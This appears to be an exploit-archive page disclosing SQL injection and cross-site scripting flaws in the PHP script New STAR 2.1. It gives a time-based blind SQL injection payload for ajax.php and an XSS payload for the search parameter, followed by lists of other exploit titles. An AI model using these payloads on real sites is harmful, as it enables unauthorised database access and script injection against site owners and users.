Menu

Search for hundreds of thousands of exploits

"New STAR 2.1 - SQL Injection / Cross-Site Scripting"

Author

Exploit author

"Kağan Çapar"

Platform

Exploit platform

php

Release date

Exploit published date

2018-05-31

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
# Exploit Title: New STAR 2.1 - SQL Injection / Cross-Site Scripting
# Dork: N/A
# Date: 30.05.2018
# Exploit Author: Kağan Çapar
# Contact: kagancapar@gmail.com
# Vendor Homepage: https://codecanyon.net/item/new-star-listen-youtube-music/7486113
# Version: 2.1
# Category: Webapps
# Tested on: Kali Linux
# Description : 'ajax.php' working in the input field contains SQL
vulnerability. The search section also contains XSS vulnerability.
====================================================

# PoC : SQLi :

Parameter: name (GET)

    Type: AND/OR time-based blind
    Demo:
http://site.com/requests/ajax.php?newstar=login&name=admin&password=123456
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: newstar=login&name=admin' AND SLEEP(5) AND
'ddni'='ddni&password=123456


====================================================

# PoC : XSS :

  Payload(1) :
http://site.com/play?mouse_search=%3E%27%3E%22%3E%3Cimg%20src=x%20onerror=alert%280%29%3E&p=1
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2019-02-20 "WinRAR 5.61 - '.lng' Denial of Service" dos windows "Kağan Çapar"
2018-11-19 "HTML Video Player 1.2.5 - Buffer-Overflow (SEH)" local windows_x86 "Kağan Çapar"
2018-10-29 "Modbus Slave PLC 7 - '.msw' Buffer Overflow (PoC)" local windows_x86 "Kağan Çapar"
2018-10-22 "Audacity 2.3 - Denial of Service (PoC)" dos windows "Kağan Çapar"
2018-10-10 "FileZilla 3.33 - Buffer Overflow (PoC)" dos linux "Kağan Çapar"
2018-05-31 "PHP Dashboards NEW 5.5 - 'email' SQL Injection" webapps php "Kağan Çapar"
2018-05-31 "CSV Import & Export 1.1.0 - SQL Injection / Cross-Site Scripting" webapps php "Kağan Çapar"
2018-05-31 "New STAR 2.1 - SQL Injection / Cross-Site Scripting" webapps php "Kağan Çapar"
2018-05-31 "Grid Pro Big Data 1.0 - SQL Injection" webapps php "Kağan Çapar"
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.